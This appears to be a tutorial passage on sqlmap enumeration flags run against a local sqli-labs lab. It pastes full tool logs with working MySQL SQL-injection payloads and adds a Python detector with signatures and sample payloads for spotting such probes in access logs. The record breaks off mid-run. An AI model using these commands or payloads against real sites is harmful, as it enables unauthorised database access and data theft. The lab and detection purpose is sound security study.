Contents
- I. Retrieving DBMS information with sqlmap
- II. Enumerating information with sqlmap
- 1. Listing database names with sqlmap
- 2. Enumerating database tables with sqlmap
- 3. Enumerating table columns with sqlmap
- 4. Enumerating data values with sqlmap
- 5. Enumerating schema information with sqlmap
- 6. Retrieving table entry counts with sqlmap
- 7. Retrieving a range of data with sqlmap
- 8. Retrieving data with a condition with sqlmap
- 9. Brute-forcing data with sqlmap
- 10. Retrieving all information with sqlmap
- III. How SQL injection works
- IV. Installing the HackBar browser plugin
- V. SQL injection
I. Retrieving DBMS information with sqlmap
1. Retrieving the DBMS banner with sqlmap
Parameter:
--banner
or -b
Retrieves the back-end database banner information.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner
Output:
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:59:39 /2020-03-02/
[07:59:40] [INFO] testing connection to the target URL
[07:59:40] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:59:40] [INFO] testing if the target URL content is stable
[07:59:41] [INFO] target URL content is stable
[07:59:41] [INFO] testing if GET parameter 'id' is dynamic
[07:59:41] [INFO] GET parameter 'id' appears to be dynamic
[07:59:41] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[07:59:41] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[07:59:41] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[07:59:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:59:47] [WARNING] reflective value(s) found and filtering out
[07:59:47] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[07:59:47] [INFO] testing 'Generic inline queries'
[07:59:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:59:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:59:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:59:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:59:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:59:47] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:59:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:59:47] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[07:59:47] [INFO] testing 'MySQL inline queries'
[07:59:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:59:47] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:59:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[07:59:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:59:58] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[07:59:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:59:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:59:58] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[07:59:58] [INFO] target URL appears to have 3 columns in query
[07:59:58] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1677=1677 AND 'TzaH'='TzaH
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1079 FROM(SELECT COUNT(*),CONCAT(0x71706a6a71,(SELECT (ELT(1079=1079,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sFVr'='sFVr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3298 FROM (SELECT(SLEEP(5)))VyAw) AND 'thOf'='thOf
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8780' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x466d6c5a6c706d6e6f575a514d446469445872776c4977674c4b727a4f6557744272736173736274,0x716a707171)-- -
---
[08:00:29] [INFO] the back-end DBMS is MySQL
[08:00:29] [INFO] fetching banner
[08:00:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[08:00:30] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:00:30 /2020-03-02/
This shows that the back-end DBMS is MySQL, version 5.7.26; the --banner information consists of basic details such as the database version.
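As an added example that is not from the original post or from sqlmap, the following Python scanner recognises the four payload shapes in the injection-point summary above (boolean-based blind, error-based FLOOR, time-based SLEEP, UNION query) when they appear in web-server access-log lines, so the same enumeration runs shown in the rest of this section can be spotted on the defending side; the combined log format, the burst threshold and the sample lines are assumptions.

```python
"""Flag sqlmap-style injection probes in web-server access logs.

Added example, not part of the original post and not sqlmap's own code.
It URL-decodes the query string of combined-format access-log lines and
matches the four payload shapes sqlmap reported against sqli-labs Less-1
(boolean-based blind, error-based FLOOR/GROUP BY, time-based SLEEP and
UNION query), then flags sources whose request volume looks like a scan.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, quote, urlsplit

# One signature per injection technique listed in the sqlmap summary above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)=\1\s+AND\s+'(\w+)'='\2", re.I),
    "error-based": re.compile(r"FLOOR\(RAND\(0\)\*2\).*GROUP\s+BY", re.I | re.S),
    "time-based": re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I),
    "union": re.compile(r"\bUNION\s+ALL\s+SELECT\b.*\bNULL\b", re.I),
}

# Apache/Nginx combined log format (assumed); only the needed fields are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def classify_request(path):
    """Return the set of technique labels matching any decoded query value.

    parse_qsl performs the single URL-decode that the server's raw request
    line needs; decoding twice would let a double-encoded probe slip past.
    """
    hits = set()
    for _name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(label)
    return hits


def scan_log(lines, burst_threshold=20):
    """Scan log lines and return (flagged, noisy_sources).

    flagged: list of (ip, path, sorted labels) for every request that
    matched at least one signature.
    noisy_sources: {ip: request_count} for sources at or above the
    threshold; sqlmap needed about 50 requests above to confirm one
    parameter, so a burst from one source is a cheap secondary signal.
    """
    flagged = []
    per_source = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; ignore rather than crash
        ip, path = m.group("ip"), m.group("path")
        per_source[ip] += 1
        labels = classify_request(path)
        if labels:
            flagged.append((ip, path, sorted(labels)))
    noisy = {ip: n for ip, n in per_source.items() if n >= burst_threshold}
    return flagged, noisy


def _log_line(ip, ts, payload, status="200"):
    """Build a constructed combined-format line for one sqli-labs request."""
    return (f'{ip} - - [{ts}] "GET /sqli-labs/Less-1/?id={quote(payload, safe="")} '
            f'HTTP/1.1" {status} 1234')


# Constructed sample: one benign request, then the four payload shapes from
# the sqlmap summary above (the UNION hex marker is shortened), all from one
# source so the burst counter also fires.
SAMPLE_PAYLOADS = [
    "1",
    "1' AND 1677=1677 AND 'TzaH'='TzaH",
    "1' AND (SELECT 1079 FROM(SELECT COUNT(*),CONCAT(0x71706a6a71,(SELECT (ELT(1079=1079,1))),"
    "0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sFVr'='sFVr",
    "1' AND (SELECT 3298 FROM (SELECT(SLEEP(5)))VyAw) AND 'thOf'='thOf",
    "-8780' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x466d6c5a,0x716a707171)-- -",
]
SAMPLE_LOG = [_log_line("127.0.0.1", "02/Mar/2020:07:59:41 +0800", p) for p in SAMPLE_PAYLOADS]

if __name__ == "__main__":
    hits, noisy = scan_log(SAMPLE_LOG, burst_threshold=5)
    for ip, path, labels in hits:
        print(f"{ip} {', '.join(labels)}: {path[:60]}")
    print("noisy sources:", noisy)
```

Signatures tied to the exact marker strings sqlmap randomises (the 0x71... hex and the 4-letter tokens) would break between runs, so the patterns above key on the SQL shape instead.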
2. Retrieving the current DBMS database with sqlmap
Parameter:
--current-db
Retrieves the name of the current database.
The database used by sqli-labs is security; test and verify:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db
Output:
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:05:30 /2020-03-02/
[08:05:31] [INFO] testing connection to the target URL
[08:05:31] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:05:31] [INFO] testing if the target URL content is stable
[08:05:31] [INFO] target URL content is stable
[08:05:31] [INFO] testing if GET parameter 'id' is dynamic
[08:05:31] [INFO] GET parameter 'id' appears to be dynamic
[08:05:31] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:05:31] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:05:31] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[08:05:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:05:33] [WARNING] reflective value(s) found and filtering out
[08:05:34] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:05:34] [INFO] testing 'Generic inline queries'
[08:05:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:05:34] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:05:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:05:34] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:05:34] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:05:34] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:05:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:05:34] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:05:34] [INFO] testing 'MySQL inline queries'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:05:34] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:05:34] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:05:34] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:05:44] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:05:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:05:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:05:44] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:05:44] [INFO] target URL appears to have 3 columns in query
[08:05:44] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1645=1645 AND 'gLeh'='gLeh
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5033 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(5033=5033,1))),0x717a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'prKI'='prKI
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4986 FROM (SELECT(SLEEP(5)))JzND) AND 'MonR'='MonR
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-2369' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707171,0x786d7141526c7542417379654d4d56465a7276617a52754e766b514779656d5a51677a566e784b6f,0x717a7a6271)-- -
---
[08:05:46] [INFO] the back-end DBMS is MySQL
[08:05:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:05:46] [INFO] fetching current database
current database: 'security'
[08:05:46] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:05:46 /2020-03-02/
This shows the current database is security.
Adding the --batch parameter makes every prompt take its default answer:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db --batch
Output:
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:08:24 /2020-03-02/
[08:08:24] [INFO] testing connection to the target URL
[08:08:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:08:24] [INFO] testing if the target URL content is stable
[08:08:25] [INFO] target URL content is stable
[08:08:25] [INFO] testing if GET parameter 'id' is dynamic
[08:08:25] [INFO] GET parameter 'id' appears to be dynamic
[08:08:25] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:08:25] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:08:25] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:08:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:08:25] [WARNING] reflective value(s) found and filtering out
[08:08:25] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:08:25] [INFO] testing 'Generic inline queries'
[08:08:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:08:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:08:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:08:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:08:25] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:08:25] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:08:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:08:26] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:08:26] [INFO] testing 'MySQL inline queries'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:08:26] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:08:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:08:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:08:36] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:08:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:08:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:08:36] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:08:36] [INFO] target URL appears to have 3 columns in query
[08:08:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9283=9283 AND 'AIxZ'='AIxZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3076 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT (ELT(3076=3076,1))),0x7176627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gPam'='gPam
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5610 FROM (SELECT(SLEEP(5)))XQPi) AND 'htpv'='htpv
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8412' UNION ALL SELECT NULL,CONCAT(0x71716a7171,0x4e5372724d6664566561576e72696e5a786c45746d6272656d4672555a4d53645164444a516b424f,0x7176627671),NULL-- -
---
[08:08:36] [INFO] the back-end DBMS is MySQL
[08:08:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:08:36] [INFO] fetching current database
current database: 'security'
[08:08:36] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:08:36 /2020-03-02/
3. Retrieving the DBMS host name with sqlmap
Parameter:
--hostname
Retrieves the host name.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --hostname
Output:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:10:10 /2020-03-02/
[08:10:10] [INFO] testing connection to the target URL
[08:10:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:10:10] [INFO] testing if the target URL content is stable
[08:10:11] [INFO] target URL content is stable
[08:10:11] [INFO] testing if GET parameter 'id' is dynamic
[08:10:11] [INFO] GET parameter 'id' appears to be dynamic
[08:10:11] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:10:11] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:10:11] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[08:10:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:10:15] [WARNING] reflective value(s) found and filtering out
[08:10:15] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:10:15] [INFO] testing 'Generic inline queries'
[08:10:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:10:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:10:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:10:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:10:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:10:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:10:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:10:16] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:10:16] [INFO] testing 'MySQL inline queries'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:10:16] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:10:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:10:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:10:26] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:10:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:10:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:10:26] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:10:26] [INFO] target URL appears to have 3 columns in query
[08:10:26] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8829=8829 AND 'CItZ'='CItZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6534 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(6534=6534,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tjcT'='tjcT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6137 FROM (SELECT(SLEEP(5)))letJ) AND 'jYdS'='jYdS
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8869' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b7071,0x777343746755676f4b4974717474594e46587845486261664a52736a75594c6b54474e6b69555659,0x71716a6271)-- -
---
[08:11:14] [INFO] the back-end DBMS is MySQL
[08:11:14] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:11:14] [INFO] fetching server hostname
hostname: 'LAPTOP-61GNXXXX'
[08:11:14] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:11:14 /2020-03-02/
This shows the host name is LAPTOP-61GNXXXX.
4. Retrieving DBMS user information with sqlmap
Checking with sqlmap whether the current user is a DBA
Parameter:
--is-dba
Checks whether the current user is a database administrator.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --is-dba
Output:
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:14:43 /2020-03-02/
[08:14:43] [INFO] testing connection to the target URL
[08:14:43] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:14:43] [INFO] testing if the target URL content is stable
[08:14:44] [INFO] target URL content is stable
[08:14:44] [INFO] testing if GET parameter 'id' is dynamic
[08:14:44] [INFO] GET parameter 'id' appears to be dynamic
[08:14:44] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:14:44] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:14:44] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[08:14:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:14:46] [WARNING] reflective value(s) found and filtering out
[08:14:46] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:14:46] [INFO] testing 'Generic inline queries'
[08:14:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:14:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:14:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:14:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:14:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:14:47] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:14:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:14:47] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:14:47] [INFO] testing 'MySQL inline queries'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:14:47] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
